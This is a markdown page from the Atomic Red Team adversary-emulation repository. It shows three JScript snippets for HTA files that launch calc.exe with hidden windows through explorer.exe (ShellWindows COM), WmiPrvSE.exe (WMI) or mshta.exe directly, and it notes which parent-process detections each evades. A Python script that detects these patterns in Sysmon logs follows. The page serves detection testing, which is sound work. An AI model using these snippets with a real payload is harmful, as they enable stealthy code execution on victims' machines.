atomic-red-team/ARTifacts/Initial_Access/hta.md
Michael Haag b51284297d Initial Access - Atomic Friday July 2019 (#530)
Adding the following:
- New DragonsTail Chain reaction that does not execute Mimikatz.
- Generic .HTA file with supporting markdown file highlighting details.
- Generic `Atomic.doc` with supporting markdown file highlighting embedded macro.
- Guide (markdown) explaining how to zip files to simulate email borne threats.
- Simple guide on how to setup a "Listener" for C2 communication in Python and Powershell.
- Generate-Macro.ps1 - Builder script that will generate 8 different macro embedded XLS files to simulate macro techniques actively being used.
2019-08-28 11:38:26 -07:00


# HTA
## AtomicHTA
Three ways to spawn calc.exe from an HTA, each producing a different process tree. Each can be modified to download a chain reaction that performs additional behaviors.
## MSHTA - Explorer Spawning CMD
Using the ShellWindows COM object, mshta.exe creates no child process of its own: the payload is handed to the already-running explorer.exe, so the tree shows explorer.exe -> cmd.exe -> calc.exe. A detection keyed only on "mshta.exe as parent" does not see this variant.
```
// Type One
// Child of Explorer, cmd.exe
// CLSID of the ShellWindows object; "new:" + CLSID instantiates it from within mshta
var ShellWindows = "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}";
// Item() returns the first Shell window, i.e. the user's running explorer.exe
var SW = GetObject("new:" + ShellWindows).Item();
// Shell.ShellExecute(file, args, dir, verb, showCmd): showCmd 0 hides the cmd window
SW.Document.Application.ShellExecute("cmd.exe", "/c calc.exe", 'C:\\Windows\\System32', null, 0);
```
## MSHTA - Wmiprvse Spawning CMD
Using the WMI Win32_Process class, mshta.exe again has no child process: the process is created inside WmiPrvSE.exe (the WMI provider host), so the tree shows WmiPrvSE.exe -> cmd.exe -> calc.exe. WmiPrvSE.exe spawning a shell is a useful signal on its own, but it is also common in environments with WMI-based management tooling, so tune accordingly.
```
// Type Two
// Child of wmiprvse
var strComputer = ".";   // local machine
var objWMIService = GetObject("winmgmts:\\\\" + strComputer + "\\root\\cimv2");
// Win32_ProcessStartup lets us request a hidden window for the new process
var objStartup = objWMIService.Get("Win32_ProcessStartup");
var objConfig = objStartup.SpawnInstance_();
objConfig.ShowWindow = 0;
var objProcess = GetObject("winmgmts:\\\\" + strComputer + "\\root\\cimv2:Win32_Process");
var intProcessID;
// Win32_Process.Create runs under WmiPrvSE.exe, so cmd.exe is its child, not mshta's.
// "/c calc.exe" is what makes cmd launch calc; the last argument is an out-parameter
// (process id) that JScript cannot receive by reference, so it stays undefined.
objProcess.Create("cmd.exe /c calc.exe", null, objConfig, intProcessID);
```
## MSHTA spawning CMD
mshta.exe is the direct parent of calc.exe. This is the noisiest of the three for parent/child-based detection, since mshta.exe spawning anything is itself the indicator.
```
// Type Three
// Child of mshta.exe
// WScript.Shell.Run creates the process directly, so mshta.exe is calc.exe's parent
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
```
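The three variants above differ only in which process ends up as the payload's parent, which is exactly what a process-creation detection has to account for. As an added example (not code from the atomic-red-team repository or this page), the Python below walks Sysmon Event ID 1 (ProcessCreate) records and flags each pattern by its process tree: a child of mshta.exe (Type Three), a launcher spawned by WmiPrvSE.exe (Type Two), and a launcher spawned by explorer.exe shortly after an mshta.exe start for the same user (Type One, where mshta.exe itself never has a child). The event records are constructed for the example; the `LAUNCHERS` set and the 30-second correlation window are assumptions to tune for your environment.

```python
"""
Added example (not part of the atomic-red-team page): correlate Sysmon
Event ID 1 (ProcessCreate) records to flag the three HTA launch patterns
by their process trees. The events are constructed for this example; the
LAUNCHERS set and the 30-second correlation window are assumptions.
"""
from datetime import datetime, timedelta

# Constructed Sysmon ProcessCreate records (field names follow Sysmon's schema).
SAMPLE_EVENTS = [
    # Type Three: mshta.exe is the direct parent of the payload.
    {"UtcTime": "2019-08-28 18:38:26.000", "User": "LAB\\alice",
     "ParentImage": "C:\\Windows\\System32\\mshta.exe",
     "Image": "C:\\Windows\\System32\\calc.exe", "CommandLine": "calc.exe"},
    # Type One: mshta.exe starts, then explorer.exe (not mshta) spawns cmd.exe.
    {"UtcTime": "2019-08-28 18:40:00.000", "User": "LAB\\alice",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "mshta.exe C:\\Users\\alice\\Downloads\\atomic.hta"},
    {"UtcTime": "2019-08-28 18:40:01.500", "User": "LAB\\alice",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c calc.exe"},
    # Type Two: WmiPrvSE.exe spawns cmd.exe via Win32_Process.Create.
    {"UtcTime": "2019-08-28 18:45:00.000", "User": "LAB\\alice",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c calc.exe"},
    # Benign: explorer.exe launching cmd.exe with no recent mshta.exe for that user.
    {"UtcTime": "2019-08-28 19:10:00.000", "User": "LAB\\bob",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe"},
]

# Assumed set of images worth flagging when spawned by explorer.exe or WmiPrvSE.exe.
LAUNCHERS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}


def _image_name(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def _parse_time(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S.%f")


def detect_hta_spawns(events, window=timedelta(seconds=30)):
    """Return (label, image, command line) tuples in event-time order.

    TypeThree: any child of mshta.exe.
    TypeTwo:   a launcher spawned by WmiPrvSE.exe.
    TypeOne:   a launcher spawned by explorer.exe within `window` of an
               mshta.exe start for the same user (mshta itself has no child).
    """
    alerts = []
    mshta_starts = []  # (time, user) of mshta.exe process creations seen so far
    for ev in sorted(events, key=lambda e: _parse_time(e["UtcTime"])):
        when = _parse_time(ev["UtcTime"])
        image = _image_name(ev["Image"])
        parent = _image_name(ev["ParentImage"])
        if image == "mshta.exe":
            mshta_starts.append((when, ev["User"]))
        if parent == "mshta.exe":
            alerts.append(("TypeThree", image, ev["CommandLine"]))
        elif parent == "wmiprvse.exe" and image in LAUNCHERS:
            alerts.append(("TypeTwo", image, ev["CommandLine"]))
        elif parent == "explorer.exe" and image in LAUNCHERS:
            recent = any(user == ev["User"] and timedelta(0) <= when - start <= window
                         for start, user in mshta_starts)
            if recent:
                alerts.append(("TypeOne", image, ev["CommandLine"]))
    return alerts


if __name__ == "__main__":
    for label, image, cmdline in detect_hta_spawns(SAMPLE_EVENTS):
        print(f"{label}: {image} <- {cmdline}")
```

Run against the sample, it flags the calc.exe under mshta.exe, the explorer.exe -> cmd.exe that follows alice's mshta.exe start, and the WmiPrvSE.exe -> cmd.exe, while leaving bob's unrelated explorer.exe -> cmd.exe alone. In production the Type One correlation should key on the Sysmon LogonId rather than the user name, and the WmiPrvSE.exe rule will need an allow-list for legitimate WMI-driven management jobs.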